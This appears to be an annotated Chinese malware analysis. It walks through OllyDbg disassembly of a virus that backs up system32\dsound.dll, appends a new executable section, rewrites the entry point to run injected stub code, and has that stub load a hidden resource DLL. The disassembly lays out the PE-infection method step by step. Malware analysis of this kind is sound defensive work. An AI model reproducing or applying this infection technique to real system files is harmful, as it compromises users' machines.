00402411? |.? C645 D8 41??? mov byte ptr ss:[ebp-0x28],0x41???????????????? ;? CopyFile
00402415? |.? 885D D9?????? mov byte ptr ss:[ebp-0x27],bl
00402418? |.? E8 70F4FFFF?? call Cracker.0040188D?????????????????????????? ;? 這個call里調用GetSystemDirectory
0040241D? |.? 8D85 08FCFFFF lea eax,[local.254]
00402423? |.? 50??????????? push eax
00402424? |.? 8D85 0CFDFFFF lea eax,[local.189]
0040242A? |.? 50??????????? push eax
0040242B? |.? E8 73F2FFFF?? call Cracker.004016A3
00402430? |.? FF75 08?????? push [arg.1]??????????????????????????????????? ;? dsound.dll
00402433? |.? 8D85 0CFDFFFF lea eax,[local.189]
00402439? |.? 50??????????? push eax
0040243A? |.? E8 5BF3FFFF?? call Cracker.0040179A?????????????????????????? ;? strcat
0040243F? |.? 8D85 0CFDFFFF lea eax,[local.189]???????????????????????????? ;? C:\windows\system32\dsound.dll
00402445? |.? 50??????????? push eax
00402446? |.? 8D85 10FEFFFF lea eax,[local.124]???????????????????????????? ;? newbuf
0040244C? |.? 50??????????? push eax
0040244D? |.? E8 51F2FFFF?? call Cracker.004016A3?????????????????????????? ;? memcpy
00402452? |.? 8D45 E4?????? lea eax,[local.7]
00402455? |.? 50??????????? push eax??????????????????????????????????????? ;? .dat
00402456? |.? 8D85 10FEFFFF lea eax,[local.124]
0040245C? |.? 50??????????? push eax
0040245D? |.? E8 38F3FFFF?? call Cracker.0040179A?????????????????????????? ;? C:\windows\system32\dsound.dll.dat
00402462? |.? 83C4 24?????? add esp,0x24
00402465? |.? 8D45 D0?????? lea eax,[local.12]
00402468? |.? 50??????????? push eax??????????????????????????????????????? ;? CopyFile
00402469? |.? 68 10604000?? push Cracker.00406010?????????????????????????? ; /FileName = "Kernel32.dll"
0040246E? |.? FF15 00504000 call dword ptr ds:[<&kernel32.LoadLibraryA>]??? ; \LoadLibraryA
00402474? |.? 50??????????? push eax
00402475? |.? E8 A6F4FFFF?? call Cracker.00401920
0040247A? |.? 8BF8????????? mov edi,eax???????????????????????????????????? ;? edi =? CopyFile
0040247C? |.? 8D85 0CFDFFFF lea eax,[local.189]
00402482? |.? 50??????????? push eax??????????????????????????????????????? ;? C:\windows\system32\dsound.dll
00402483? |.? E8 3CF3FFFF?? call Cracker.004017C4?????????????????????????? ;? 調用FindFirstFile 查看傳入參數文件是否存在
00402488? |.? 8BF0????????? mov esi,eax
0040248A? |.? 8D85 10FEFFFF lea eax,[local.124]
00402490? |.? 50??????????? push eax??????????????????????????????????????? ;? 看C:\windows\system32\dsound.dll.dat是否存在
004024B2? |> \8D85 10FEFFFF lea eax,[local.124]
004024B8? |.? 53??????????? push ebx
004024B9? |.? 50??????????? push eax
004024BA? |.? 8D85 0CFDFFFF lea eax,[local.189]???????????????????????????? ;? C:\windows\system32\dsound.dll.dat
004024C0? |.? 50??????????? push eax??????????????????????????????????????? ;? C:\windows\system32\dsound.dll
004024C1? |.? FFD7????????? call edi??????????????????????????????????????? ;? copyfile
004024C3? |>? 8D8D 14FFFFFF lea ecx,[local.59]????????????????????????????? ;? 系統目錄\system\"下是否存在"dsound.dll"文件,如果存在則備份dsound.dll
004024C9? |.? C645 DC 2E??? mov byte ptr ss:[ebp-0x24],0x2E
接下來使用備份文件dsound.dll.bat
004024DD? |.? C645 E1 36??? mov byte ptr ss:[ebp-0x1F],0x36?????????? ;? .text6
004024E1? |.? 885D E2?????? mov byte ptr ss:[ebp-0x1E],bl
004024E4? |.? C645 EC 2E??? mov byte ptr ss:[ebp-0x14],0x2E
004024E8? |.? C645 ED 74??? mov byte ptr ss:[ebp-0x13],0x74
004024EC? |.? C645 EE 65??? mov byte ptr ss:[ebp-0x12],0x65
004024F0? |.? C645 EF 78??? mov byte ptr ss:[ebp-0x11],0x78
004024F4? |.? C645 F0 74??? mov byte ptr ss:[ebp-0x10],0x74
004024F8? |.? C645 F1 38??? mov byte ptr ss:[ebp-0xF],0x38??????????? ;? .text8
004024FC? |.? 885D F2?????? mov byte ptr ss:[ebp-0xE],bl
004024FF? |.? E8 6D130000?? call Cracker.00403871???????????????????? ;? new 后面拷貝備份文件使用
00402504? |.? 8D85 10FEFFFF lea eax,[local.124]?????????????????????? ;? C:\windows\system32\dsound.dll.dat
0040250A? |.? 8D8D 14FFFFFF lea ecx,[local.59]
00402510? |.? 50??????????? push eax
00402511? |.? 895D FC?????? mov [local.1],ebx
00402514? |.? E8 A5170000?? call Cracker.00403CBE
跟進call 00403CBE
00403D5E? |.? 6A 00???????? push 0x0????????????????????????????????? ; /pOverlapped = NULL
00403D60? |.? 51??????????? push ecx????????????????????????????????? ; |pBytesRead
00403D61? |.? FF76 04?????? push dword ptr ds:[esi+0x4]?????????????? ; | FileSize
00403D64? |.? 50??????????? push eax????????????????????????????????? ; |Buffer
00403D65? |.? 57??????????? push edi????????????????????????????????? ; |hFile
00403D66? |.? FF15 10504000 call dword ptr ds:[<&kernel32.ReadFile>]? ; \ReadFile
00403D6C? |.? 57??????????? push edi????????????????????????????????? ;? 將備份的dsound.dll.bat文件讀入緩沖區
接下來使用memcpy分段拷貝dsound.dll.bat 到全面準備好的緩沖區中
00403D6D? |.? FF5424 14???? call dword ptr ss:[esp+0x14]
00403D71? |.? 55??????????? push ebp????????????????????????????????? ; /40? 拷貝dsound.dll.bat文件pe頭前0x40字節到00393AD0
00403D72? |.? FF36????????? push dword ptr ds:[esi]?????????????????? ; |src
00403D74? |.? FF76 08?????? push dword ptr ds:[esi+0x8]?????????????? ; |dest
00403D77? |.? E8 B00A0000?? call <jmp.&MSVCRT.memcpy>???????????????? ; \memcpy
00403D7C? |.? 8B46 08?????? mov eax,dword ptr ds:[esi+0x8]
00403DEB? |> \0FB768 06???? movzx ebp,word ptr ds:[eax+0x6]?????????? ;? 區塊個數
00403DEF? |.? 85ED????????? test ebp,ebp
00403DF1? |.? 76 6E???????? jbe XCracker.00403E61
00403DF3? |.? 836424 1C 00? and dword ptr ss:[esp+0x1C],0x0
00403DF8? |.? 8D7E 1C?????? lea edi,dword ptr ds:[esi+0x1C]
00403DFB? |.? 896C24 10???? mov dword ptr ss:[esp+0x10],ebp
00403DFF? |>? 8B4424 1C???? /mov eax,dword ptr ss:[esp+0x1C]
00403E03? |.? 6A 28???????? |push 0x28??????????????????????????????? ; /n = 28 (40.)
00403E05? |.? 0306????????? |add eax,dword ptr ds:[esi]?????????????? ; |
00403E07? |.? 03C3????????? |add eax,ebx????????????????????????????? ; |
00403E09? |.? 50??????????? |push eax???????????????????????????????? ; |src
00403E0A? |.? FF37????????? |push dword ptr ds:[edi]????????????????? ; |dest
00403E0C? |.? E8 1B0A0000?? |call <jmp.&MSVCRT.memcpy>??????????????? ; \memcpy
00403E11? |.? 834424 28 28? |add dword ptr ss:[esp+0x28],0x28
00403E16? |.? 83C4 0C?????? |add esp,0xC
00403E19? |.? 83C7 04?????? |add edi,0x4
00403E1C? |.? FF4C24 10???? |dec dword ptr ss:[esp+0x10]????????????? ;? 拷貝區塊頭
00403E29? |> /8B46 18?????? /mov eax,dword ptr ds:[esi+0x18]
00403E2C? |. |8BCE????????? |mov ecx,esi
00403E2E? |. |FF70 3C?????? |push dword ptr ds:[eax+0x3C]???????????? ;? 文件對齊值200h
00403E31? |. |8B07????????? |mov eax,dword ptr ds:[edi]?????????????? ;? 區塊頭
00403E33? |. |FF70 10?????? |push dword ptr ds:[eax+0x10]???????????? ;? 區塊文件大小
00403E36? |. |E8 A5FAFFFF?? |call Cracker.004038E0??????????????????? ;? 對齊后大小
00403E3B? |. |50??????????? |push eax???????????????????????????????? ; /MemSize
00403E3C? |. |6A 40???????? |push 0x40??????????????????????????????? ; |Flags = GPTR
00403E3E? |. |FF15 38504000 |call dword ptr ds:[<&kernel32.GlobalAllo>; \GlobalAlloc
00403E44? |. |8947 50?????? |mov dword ptr ds:[edi+0x50],eax????????? ;? 開辟區塊大小
00403E47? |. |8B0F????????? |mov ecx,dword ptr ds:[edi]
00403E49? |. |FF71 10?????? |push dword ptr ds:[ecx+0x10]???????????? ; /n
00403E4C? |. |8B49 14?????? |mov ecx,dword ptr ds:[ecx+0x14]????????? ; |
00403E4F? |. |030E????????? |add ecx,dword ptr ds:[esi]?????????????? ; |
00403E51? |. |51??????????? |push ecx???????????????????????????????? ; |src
00403E52? |. |50??????????? |push eax???????????????????????????????? ; |dest
00403E53? |. |E8 D4090000?? |call <jmp.&MSVCRT.memcpy>??????????????? ; \memcpy
00403E58? |. |83C4 0C?????? |add esp,0xC????????????????????????????? ;? 拷貝區塊數據
接下來重寫備份文件dsound.dll.bat 在這個文件末尾增加一個區段
00402525? |.? 50??????????? push eax????????????????????????????????? ;? .text6
00402526? |.? E8 FF150000?? call Cracker.00403B2A???????????????????? ;? 查看是否有增加區段
0040252B? |.? 85C0????????? test eax,eax
00402545? |.? FF75 0C?????? push [arg.2]????????????????????????????? ;?? C:\Program Files\Common Files\System\kd******.dla(資源)
00402548? |.? 8D45 EC?????? lea eax,[local.5]???????????????????????? ;? .text8
0040254B? |.? 8D8D 14FFFFFF lea ecx,[local.59]
00402551? |.? 68 00080000?? push 0x800??????????????????????????????? ;? size
00402556? |.? 50??????????? push eax????????????????????????????????? ;? .text8
00402557? |.? E8 63140000?? call Cracker.004039BF???????????????????? ;? 增加區段
跟進
004039D0? |.? FF70 3C?????? push dword ptr ds:[eax+0x3C]????????????? ;? 文件對齊200h
004039D3? |.? 0FB758 06???? movzx ebx,word ptr ds:[eax+0x6]?????????? ;? 區塊數
004039D7? |.? FF75 0C?????? push [arg.2]????????????????????????????? ;? size= 800
004039DA? |.? E8 01FFFFFF?? call Cracker.004038E0???????????????????? ;? 對齊函數
004039DF? |.? 8B4E 18?????? mov ecx,dword ptr ds:[esi+0x18]
004039E2? |.? 8945 0C?????? mov [arg.2],eax
004039E5? |.? FF71 38?????? push dword ptr ds:[ecx+0x38]????????????? ;? 內存對齊
004039E8? |.? 8BCE????????? mov ecx,esi
004039EA? |.? 50??????????? push eax
004039EB? |.? E8 F0FEFFFF?? call Cracker.004038E0???????????????????? ;? 1000h
004039F0? |.? 8B4E 18?????? mov ecx,dword ptr ds:[esi+0x18]
004039F3? |.? 8945 F0?????? mov [local.4],eax???????????????????????? ;? 內存對齊大小1000h
004039F6? |.? 8B449E 18???? mov eax,dword ptr ds:[esi+ebx*4+0x18]???? ;? 最后一個區塊頭
004039FA? |.? FF71 3C?????? push dword ptr ds:[ecx+0x3C]
004039FD? |.? 8B48 14?????? mov ecx,dword ptr ds:[eax+0x14]?????????? ;? 最后區塊文件偏移
00403A00? |.? 0348 10?????? add ecx,dword ptr ds:[eax+0x10]?????????? ;? 文件大小 =? 最后區塊文件大小+文件偏移
00403A03? |.? 51??????????? push ecx
00403A04? |.? 8BCE????????? mov ecx,esi
00403A06? |.? E8 D5FEFFFF?? call Cracker.004038E0
00403A0B? |.? 8B4E 18?????? mov ecx,dword ptr ds:[esi+0x18]
00403A0E? |.? 8945 FC?????? mov [local.1],eax???????????????????????? ;? 對齊大小59C00
00403A11? |.? 8B449E 18???? mov eax,dword ptr ds:[esi+ebx*4+0x18]
00403A15? |.? FF71 38?????? push dword ptr ds:[ecx+0x38]
00403A18? |.? 8B48 0C?????? mov ecx,dword ptr ds:[eax+0xC]
00403A1B? |.? 0348 08?????? add ecx,dword ptr ds:[eax+0x8]
00403A1E? |.? 51??????????? push ecx
00403A1F? |.? 8BCE????????? mov ecx,esi
00403A21? |.? E8 BAFEFFFF?? call Cracker.004038E0???????????????????? ;? 內存映射后大小
00403A26? |.? 8D7C9E 1C???? lea edi,dword ptr ds:[esi+ebx*4+0x1C]
00403A2A? |.? 6A 28???????? push 0x28???????????????????????????????? ; /n = 28 (40.)
00403A2C? |.? 6A 00???????? push 0x0????????????????????????????????? ; |c = 00
00403A2E? |.? 8945 F8?????? mov [local.2],eax???????????????????????? ; | 5C000
00403A31? |.? FF37????????? push dword ptr ds:[edi]?????????????????? ; |s
00403A33? |.? 897D EC?????? mov [local.5],edi???????????????????????? ; |
00403A36? |.? E8 F70D0000?? call <jmp.&MSVCRT.memset>???????????????? ; \memset
00403A3B? |.? 8B07????????? mov eax,dword ptr ds:[edi]
00403A3D? |.? 8B4D FC?????? mov ecx,[local.1]
00403A40? |.? FF75 08?????? push [arg.1]????????????????????????????? ; /s
00403A43? |.? 8948 14?????? mov dword ptr ds:[eax+0x14],ecx?????????? ; |文件偏移
00403A46? |.? 8B07????????? mov eax,dword ptr ds:[edi]??????????????? ; |
00403A48? |.? 8B4D F8?????? mov ecx,[local.2]???????????????????????? ; |內存映射偏移
00403A4B? |.? 8948 0C?????? mov dword ptr ds:[eax+0xC],ecx??????????? ; |
00403A4E? |.? 8B0F????????? mov ecx,dword ptr ds:[edi]??????????????? ; |
00403A50? |.? 8B45 0C?????? mov eax,[arg.2]?????????????????????????? ; |
00403A53? |.? 8941 10?????? mov dword ptr ds:[ecx+0x10],eax?????????? ; |文件大小
00403A56? |.? 8B0F????????? mov ecx,dword ptr ds:[edi]??????????????? ; |
00403A58? |.? 8941 08?????? mov dword ptr ds:[ecx+0x8],eax??????????? ; |
00403A5B? |.? 8B07????????? mov eax,dword ptr ds:[edi]??????????????? ; |
00403A5D? |.? C740 24 60000>mov dword ptr ds:[eax+0x24],0xE0000060??? ; |區塊屬性
00403A64? |.? E8 BD0D0000?? call <jmp.&MSVCRT.strlen>???????????????? ; \strlen
00403A69? |.? 50??????????? push eax????????????????????????????????? ; /n
00403A6A? |.? FF75 08?????? push [arg.1]????????????????????????????? ; |src
00403A6D? |.? FF37????????? push dword ptr ds:[edi]?????????????????? ; |dest
00403A6F? |.? E8 B80D0000?? call <jmp.&MSVCRT.memcpy>???????????????? ; \memcpy
00403A74? |.? 83C4 1C?????? add esp,0x1C????????????????????????????? ;? 給新增加區塊賦值
00403A77? |.? 8D5C9E 6C???? lea ebx,dword ptr ds:[esi+ebx*4+0x6C]
00403A7B? |.? FF75 0C?????? push [arg.2]????????????????????????????? ; /MemSize
00403A7E? |.? 6A 40???????? push 0x40???????????????????????????????? ; |Flags = GPTR
00403A80? |.? FF15 38504000 call dword ptr ds:[<&kernel32.GlobalAlloc>; \GlobalAlloc
00403A86? |.? 8903????????? mov dword ptr ds:[ebx],eax
00403A88? |.? 8B46 18?????? mov eax,dword ptr ds:[esi+0x18]
00403A8B? |.? 68 65010000?? push 0x165??????????????????????????????? ; /n = 165 (357.)
00403A90? |.? 68 88604000?? push Cracker.00406088???????????????????? ; |src = Cracker.00406088
00403A95? |.? 66:FF40 06??? inc word ptr ds:[eax+0x6]???????????????? ; |區塊數加1
00403A99? |.? 8B17????????? mov edx,dword ptr ds:[edi]??????????????? ; |
00403A9B? |.? 8B4E 18?????? mov ecx,dword ptr ds:[esi+0x18]?????????? ; |
00403A9E? |.? 8B52 0C?????? mov edx,dword ptr ds:[edx+0xC]??????????? ; |.text8 的 VirtualAddress
00403AA1? |.? 8B41 28?????? mov eax,dword ptr ds:[ecx+0x28]?????????? ; |eax = 原oep(1788)
00403AA4? |.? 8951 28?????? mov dword ptr ds:[ecx+0x28],edx?????????? ; |修改ope 重新增加區塊處執行? ?
00403AA7? |.? 8B0F????????? mov ecx,dword ptr ds:[edi]??????????????? ; |
00403AA9? |.? 2B41 0C?????? sub eax,dword ptr ds:[ecx+0xC]??????????? ; |
00403AAC? |.? 2D 42010000?? sub eax,0x142???????????????????????????? ; |
00403AB1? |.? A3 E6614000?? mov dword ptr ds:[0x4061E6],eax?????????? ; |
00403AB6? |.? FF33????????? push dword ptr ds:[ebx]?????????????????? ; |dest
00403AB8? |.? E8 6F0D0000?? call <jmp.&MSVCRT.memcpy>???????????????? ; \memcpy
00403ABD? |.? 8B03????????? mov eax,dword ptr ds:[ebx]??????????????? ;? 拷貝(357字節大小)地址406088作作為新區段
00403ABF? |.? 6A 04???????? push 0x4????????????????????????????????? ; /n = 4
00403AC1? |.? 68 F0614000?? push Cracker.004061F0???????????????????? ; |src = Cracker.004061F0
00403AC6? |.? C680 64010000>mov byte ptr ds:[eax+0x164],0x1?????????? ; |
00403ACD? |.? 8B03????????? mov eax,dword ptr ds:[ebx]??????????????? ; |
00403ACF? |.? 05 66010000?? add eax,0x166???????????????????????????? ; |
00403AD4? |.? 50??????????? push eax????????????????????????????????? ; |dest
00403AD5? |.? E8 520D0000?? call <jmp.&MSVCRT.memcpy>???????????????? ; \memcpy
00403ADA? |.? 8B03????????? mov eax,dword ptr ds:[ebx]??????????????? ;? 拷貝CSO
00403ADC? |.? FF75 10?????? push [arg.3]????????????????????????????? ;? 資源dll
00403ADF? |.? C680 65010000>mov byte ptr ds:[eax+0x165],0x78????????? ;? 修改剛拷貝的第357字節為0x78
00403AE6? |.? 8B03????????? mov eax,dword ptr ds:[ebx]
00403AE8? |.? 05 6A010000?? add eax,0x16A
00403AED? |.? 50??????????? push eax
00403AEE? |.? E8 B0DBFFFF?? call Cracker.004016A3???????????????????? ;? 拷貝C:\Program Files\Common Files\System\kd******.dla路徑
修改pe ,然后把修改后的pe 寫回dsound.dll.bat
00403EDD? |.? 6A 03???????? push 0x3
00403EDF? |.? 57??????????? push edi
00403EE0? |.? FF75 08?????? push [arg.1]????????????????????????????? ;? 打開文件dsound.dll.bat
00403EE3? |.? FF55 F8?????? call [local.2]
00403EE6? |.? 83F8 FF?????? cmp eax,-0x1
00403EE9? |.? 8945 FC?????? mov [local.1],eax
00403EEC? |.? 75 04???????? jnz XCracker.00403EF2
00403EEE? |.? 6A 03???????? push 0x3
00403EF0? |.? EB 34???????? jmp XCracker.00403F26
00403EF2? |>? 8BCE????????? mov ecx,esi
00403EF4? |.? E8 FDF9FFFF?? call Cracker.004038F6
跟進這個call
修改PE ?
0040390C? |> /FF70 38?????? /push dword ptr ds:[eax+0x38]???????????? ;? 內存對齊1000h
0040390F? |. |8B07????????? |mov eax,dword ptr ds:[edi]
00403911? |. |8BCE????????? |mov ecx,esi
00403913? |. |FF70 0C?????? |push dword ptr ds:[eax+0xC]????????????? ;? 區段RVA
00403916? |. |E8 C5FFFFFF?? |call Cracker.004038E0
0040391B? |. |8B0F????????? |mov ecx,dword ptr ds:[edi]
0040391D? |. |8941 0C?????? |mov dword ptr ds:[ecx+0xC],eax
00403920? |. |8B46 18?????? |mov eax,dword ptr ds:[esi+0x18]
00403923? |. |8BCE????????? |mov ecx,esi
00403925? |. |FF70 38?????? |push dword ptr ds:[eax+0x38]
00403928? |. |8B07????????? |mov eax,dword ptr ds:[edi]
0040392A? |. |FF70 08?????? |push dword ptr ds:[eax+0x8]????????????? ;? 區段內存大小
0040392D? |. |E8 AEFFFFFF?? |call Cracker.004038E0??????????????????? ;? 對齊函數
00403932? |. |8B0F????????? |mov ecx,dword ptr ds:[edi]
00403934? |. |8941 08?????? |mov dword ptr ds:[ecx+0x8],eax
00403937? |. |8B46 18?????? |mov eax,dword ptr ds:[esi+0x18]
0040393A? |. |8BCE????????? |mov ecx,esi
0040393C? |. |FF70 3C?????? |push dword ptr ds:[eax+0x3C]???????????? ;? 200h
0040393F? |. |8B07????????? |mov eax,dword ptr ds:[edi]
00403941? |. |FF70 14?????? |push dword ptr ds:[eax+0x14]???????????? ;? 文件偏移
00403956? |.? 8B07????????? |mov eax,dword ptr ds:[edi]
00403958? |.? FF70 10?????? |push dword ptr ds:[eax+0x10]???????????? ;? 文件大小
0040395B? |.? E8 80FFFFFF?? |call Cracker.004038E0??????????????????? ;? 對齊后大小
00403960? |.? 8B0F????????? |mov ecx,dword ptr ds:[edi]
00403962? |.? 43??????????? |inc ebx
00403963? |.? 83C7 04?????? |add edi,0x4
00403966? |.? 8941 10?????? |mov dword ptr ds:[ecx+0x10],eax
00403969? |.? 8B46 18?????? |mov eax,dword ptr ds:[esi+0x18]
0040396C? |.? 0FB748 06???? |movzx ecx,word ptr ds:[eax+0x6]
00403970? |.? 3BD9????????? |cmp ebx,ecx
00403972? |.^ 7C 98???????? \jl XCracker.0040390C???????????????????? ;? 將每個區段大小對齊
00403974? |.? 5F??????????? pop edi
00403975? |>? 8B449E 18???? mov eax,dword ptr ds:[esi+ebx*4+0x18]???? ;? 。text8
00403979? |.? 8B48 0C?????? mov ecx,dword ptr ds:[eax+0xC]??????????? ;? VirtualAddress
0040397C? |.? 0348 08?????? add ecx,dword ptr ds:[eax+0x8]??????????? ;? ecx = sizeOfImage
0040397F? |.? 8B46 18?????? mov eax,dword ptr ds:[esi+0x18]?????????? ;? pe
00403982? |.? 8948 50?????? mov dword ptr ds:[eax+0x50],ecx?????????? ;? 更該 SizeOfImage
00403985? |.? 8B46 18?????? mov eax,dword ptr ds:[esi+0x18]
00403988? |.? 89A8 C8000000 mov dword ptr ds:[eax+0xC8],ebp
0040398E? |.? 8B46 18?????? mov eax,dword ptr ds:[esi+0x18]
00403991? |.? 89A8 CC000000 mov dword ptr ds:[eax+0xCC],ebp
00403997? |.? 8B46 18?????? mov eax,dword ptr ds:[esi+0x18]
0040399A? |.? 89A8 D0000000 mov dword ptr ds:[eax+0xD0],ebp
004039A0? |.? 8B46 18?????? mov eax,dword ptr ds:[esi+0x18]
004039A3? |.? 89A8 D4000000 mov dword ptr ds:[eax+0xD4],ebp
004039A9? |.? 8B46 18?????? mov eax,dword ptr ds:[esi+0x18]
004039AC? |.? 89A8 D8000000 mov dword ptr ds:[eax+0xD8],ebp?????????? ;? 修改 目錄表
可以發現這個病毒使用一個結構體存放PE信息
[esi+8] = IMAGE_DOS_HEADER (0x40)
[esi+10] = A8 //MS_DOS 大小
[esi+C] = MS_DOS
[esi+14] = IMAGE_DOS_Header大小 = 0x40
[esi+18] = Image_Nt_Header
[esi+1C] = 存放Image_section_header 轉到這個地址可以發現
0012F3B8? 18 3C 39 00 48 3C 39 00 78 3C 39 00 A8 3C 39 00? <9.H<9.x<9.?9.
0012F3C8? D8 3C 39 00 08 3D 39 00 38 3D 39 00 68 3D 39 00? ?9.=9.8=9.h=9.
0012F3D8? 98 3D 39 00 C8 3D 39 00 F8 3D 39 00 28 3E 39 00? ?9.?9.?9.(>9.
0012F3E8? 58 3E 39 00 88 3E 39 00 B8 3E 39 00 E8 3E 39 00? X>9.?9.?9.?9.
這個存放了各個區塊頭
上面這點發現了,,接下來就比較簡單了
00403E7F? |.? 8B3D 00504000 mov edi,dword ptr ds:[<&kernel32.LoadLibr>;? kernel32.LoadLibraryA
00403E85? |.? 8BF1????????? mov esi,ecx
00403E87? |.? BB 10604000?? mov ebx,Cracker.00406010????????????????? ;? ASCII "Kernel32.dll"
00403E8C? |.? 68 50604000?? push Cracker.00406050???????????????????? ;? ASCII "CloseHandle"
00403E91? |.? 8326 00?????? and dword ptr ds:[esi],0x0
00403E94? |.? 53??????????? push ebx????????????????????????????????? ; /FileName => "Kernel32.dll"
00403E95? |.? FFD7????????? call edi????????????????????????????????? ; \LoadLibraryA
00403E97? |.? 50??????????? push eax
00403E98? |.? E8 83DAFFFF?? call Cracker.00401920
00403E9D? |.? 59??????????? pop ecx
00403E9E? |.? 8945 F4?????? mov [local.3],eax
00403EA1? |.? 59??????????? pop ecx
00403EA2? |.? 68 44604000?? push Cracker.00406044???????????????????? ;? ASCII "CreateFileA"
00403EE0? |.? FF75 08?????? push [arg.1]????????????????????????????? ;? 打開文件dsound.dll.bat
00403EE3? |.? FF55 F8?????? call [local.2]
00403EE6? |.? 83F8 FF?????? cmp eax,-0x1
00403EE9? |.? 8945 FC?????? mov [local.1],eax
00403EEC? |.? 75 04???????? jnz XCracker.00403EF2
00403EEE? |.? 6A 03???????? push 0x3
00403EF0? |.? EB 34???????? jmp XCracker.00403F26
00403EF2? |>? 8BCE????????? mov ecx,esi
00403EF4? |.? E8 FDF9FFFF?? call Cracker.004038F6
00403EF9? |.? 8B46 18?????? mov eax,dword ptr ds:[esi+0x18]
00403EFC? |.? 0FB740 06???? movzx eax,word ptr ds:[eax+0x6]?????????? ;? 區段 = 5
00403F00? |.? 8B4486 18???? mov eax,dword ptr ds:[esi+eax*4+0x18]???? ;? .text8段
00403F04? |.? 8B48 14?????? mov ecx,dword ptr ds:[eax+0x14]?????????? ;? ecx = 指向文件偏移
00403F07? |.? 8B40 10?????? mov eax,dword ptr ds:[eax+0x10]?????????? ;? eax = 該區塊文件大小
00403F0A? |.? 03C1????????? add eax,ecx?????????????????????????????? ;? eax = 文件大小
00403F0C? |.? 50??????????? push eax????????????????????????????????? ; /MemSize
00403F0D? |.? 6A 40???????? push 0x40???????????????????????????????? ; |Flags = GPTR
00403F0F? |.? 8946 04?????? mov dword ptr ds:[esi+0x4],eax??????????? ; |
00403F12? |.? FF15 38504000 call dword ptr ds:[<&kernel32.GlobalAlloc>; \GlobalAlloc
00403F18? |.? 85C0????????? test eax,eax????????????????????????????? ;? 開辟空間
00403F31? |> \6A 40???????? push 0x40???????????????????????????????? ; /n = 40 (64.)
00403F33? |.? FF76 08?????? push dword ptr ds:[esi+0x8]?????????????? ; |存放IMAGE_DOS_HANDLE
00403F36? |.? 50??????????? push eax????????????????????????????????? ; |dest
00403F37? |.? E8 F0080000?? call <jmp.&MSVCRT.memcpy>???????????????? ; \memcpy
00403F3C? |.? 8B46 10?????? mov eax,dword ptr ds:[esi+0x10]
00403F3F? |.? 83C4 0C?????? add esp,0xC
00403F42? |.? A9 00000080?? test eax,0x80000000
00403F47? |.? 75 12???????? jnz XCracker.00403F5B
00403F49? |.? 50??????????? push eax????????????????????????????????? ; /MS_DOS 大小
00403F4A? |.? 8B46 14?????? mov eax,dword ptr ds:[esi+0x14]?????????? ; |IMAGE_DOS_Hander 大小
00403F4D? |.? FF76 0C?????? push dword ptr ds:[esi+0xC]?????????????? ; |src
00403F50? |.? 0306????????? add eax,dword ptr ds:[esi]??????????????? ; |
00403F52? |.? 50??????????? push eax????????????????????????????????? ; |dest
00403F53? |.? E8 D4080000?? call <jmp.&MSVCRT.memcpy>???????????????? ; \memcpy
00403F58? |.? 83C4 0C?????? add esp,0xC
00403F5B? |> \8B46 08?????? mov eax,dword ptr ds:[esi+0x8]
00403F5E? |.? BB F8000000?? mov ebx,0xF8
00403F63? |.? 53??????????? push ebx????????????????????????????????? ; /n => F8 (248.)
00403F64? |.? 8B40 3C?????? mov eax,dword ptr ds:[eax+0x3C]?????????? ; |e_lfanew
00403F67? |.? FF76 18?????? push dword ptr ds:[esi+0x18]????????????? ; |src
00403F6A? |.? 0306????????? add eax,dword ptr ds:[esi]??????????????? ; |Image_nt_Header
00403F6C? |.? 50??????????? push eax????????????????????????????????? ; |dest
00403F6D? |.? E8 BA080000?? call <jmp.&MSVCRT.memcpy>???????????????? ; \memcpy
00403F72? |.? 8B46 08?????? mov eax,dword ptr ds:[esi+0x8]
00403F75? |.? 83C4 0C?????? add esp,0xC
00403F78? |.? 8B78 3C?????? mov edi,dword ptr ds:[eax+0x3C]
00403F7B? |.? 8B46 18?????? mov eax,dword ptr ds:[esi+0x18]
00403F7E? |.? 03FB????????? add edi,ebx?????????????????????????????? ;? edi = 區塊頭(偏移)
00403F80? |.? 0FB740 06???? movzx eax,word ptr ds:[eax+0x6]?????????? ;? 區塊數
00403F84? |.? 85C0????????? test eax,eax
00403F86? |.? 8945 F0?????? mov [local.4],eax
00403F89? |.? 76 52???????? jbe XCracker.00403FDD
00403F8B? |.? 8365 08 00??? and [arg.1],0x0
00403F8F? |.? 8D5E 1C?????? lea ebx,dword ptr ds:[esi+0x1C]?????????? ;? IMage_SECTION_Header
00403F92? |.? 8945 F8?????? mov [local.2],eax
00403F95? |>? 8B45 08?????? /mov eax,[arg.1]
00403F98? |.? 6A 28???????? |push 0x28??????????????????????????????? ; /n = 28 (40.)
00403F9A? |.? 0306????????? |add eax,dword ptr ds:[esi]?????????????? ; |
00403F9C? |.? FF33????????? |push dword ptr ds:[ebx]????????????????? ; |IMAGE_SECTION_HEADER
00403F9E? |.? 03C7????????? |add eax,edi????????????????????????????? ; |
00403FA0? |.? 50??????????? |push eax???????????????????????????????? ; |dest
00403FA1? |.? E8 86080000?? |call <jmp.&MSVCRT.memcpy>??????????????? ; \memcpy
00403FA6? |.? 8345 08 28??? |add [arg.1],0x28
00403FAA? |.? 83C4 0C?????? |add esp,0xC
00403FAD? |.? 83C3 04?????? |add ebx,0x4
00403FB0? |.? FF4D F8?????? |dec [local.2]??????????????????????????? ;? count = 6
00403FB3? |.^ 75 E0???????? \jnz XCracker.00403F95
00403FBF? |.? 8BD8????????? mov ebx,eax
00403FC1? |>? 8B07????????? /mov eax,dword ptr ds:[edi]
00403FC3? |.? FF70 10?????? |push dword ptr ds:[eax+0x10]???????????? ; /區塊 SizeOfRawData
00403FC6? |.? 8B40 14?????? |mov eax,dword ptr ds:[eax+0x14]????????? ; |文件指針
00403FC9? |.? 0306????????? |add eax,dword ptr ds:[esi]?????????????? ; |
00403FCB? |.? FF77 50?????? |push dword ptr ds:[edi+0x50]???????????? ; |src
00403FCE? |.? 50??????????? |push eax???????????????????????????????? ; |dest
00403FCF? |.? E8 58080000?? |call <jmp.&MSVCRT.memcpy>??????????????? ; \memcpy
00403FD4? |.? 83C4 0C?????? |add esp,0xC
00403FD7? |.? 83C7 04?????? |add edi,0x4
00403FDA? |.? 4B??????????? |dec ebx????????????????????????????????? ;? 拷貝個區塊數據
00403FDB? |.^ 75 E4???????? \jnz XCracker.00403FC1
00403FDD? |>? 8B5D FC?????? mov ebx,[local.1]???????????????????????? ;? dsound.dll,bat
00403FE0? |.? 8B3D 14504000 mov edi,dword ptr ds:[<&kernel32.SetFileP>;? kernel32.SetFilePointer
00403FE6? |.? 33C0????????? xor eax,eax
00403FE8? |.? 50??????????? push eax????????????????????????????????? ; /Origin => FILE_BEGIN
